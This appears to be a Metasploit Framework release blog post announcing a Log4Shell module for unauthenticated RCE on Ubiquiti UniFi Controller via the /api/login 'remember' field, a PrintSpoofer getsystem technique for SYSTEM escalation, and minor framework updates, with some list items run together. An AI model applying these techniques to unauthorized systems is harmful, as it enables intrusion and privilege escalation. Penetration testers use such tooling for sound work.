For those wondering when the Log4Shell remediation nightmare will end, I’m afraid I can’t give you that. What I can give you, though, is a new Log4Shell module! With the new module from zeroSteiner you can expect to get unauthenticated RCE on the Ubiquiti UniFi Controller Application via a POST request to the /api/login
page. Be sure to leverage the module’s check
function since scanners detecting header injection may not work.
smashery has done an amazing job working on giving us a fifth getsystem
technique on the Windows Meterpreter. This newest addition ports Clément Labro’s PrintSpoofer technique to Metasploit. It gains SYSTEM privileges from the LOCAL SERVICE and NETWORK SERVICE accounts by abusing the SeImpersonatePrivilege
privilege. Like the other getsystem techniques, this attack takes place entirely in memory without any additional configuration on both 32-bit and 64-bit versions of Windows. It has been tested successfully on Windows 8.1 / Server 2016 and later. Unlike some of the other getsystem technqiues this one also has the advantage of not starting services which is often an action that is identified as malicious. Users can run this elevation technique directory by using the getsystem -t 5
command in Meterpreter. Now exploits that yield sessions LOCAL SERVICE and NETWORK SERVICE permissions can easily be upgraded to full SYSTEM level privileges.
root
level code execution.remember
field of a POST request to the /api/login
page. Successful exploitation results in OS command execution in the context of the server application.getsystem
option using SeImpersonatePrivilege to gain SYSTEM privileges using the Print Spooler primitive on Windows. It is the Framework side of <https://github.com/rapid7/metasploit-payloads/pull/509>.exploit/scanner/auxiliary/scada/modbusclient
module has been enhanced to support command 0x2B which gives clear text info about a device. Additionally the module’s code has been updated to comply with RuboCop standards.user_data_directory
has been added to lib/msf/base/config.rb
to allow users that use private Metasploit modules to keep module resources organized in the same way that MSF does for core modules, all whilst keeping their ~/.msf4 directory portable between installs.ReverseListenerComm
and ListenerComm
datastore options have now been updated to support specifying -1
to refer to the most recently created session without having to either remember what it was or change it when a new session is created.As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).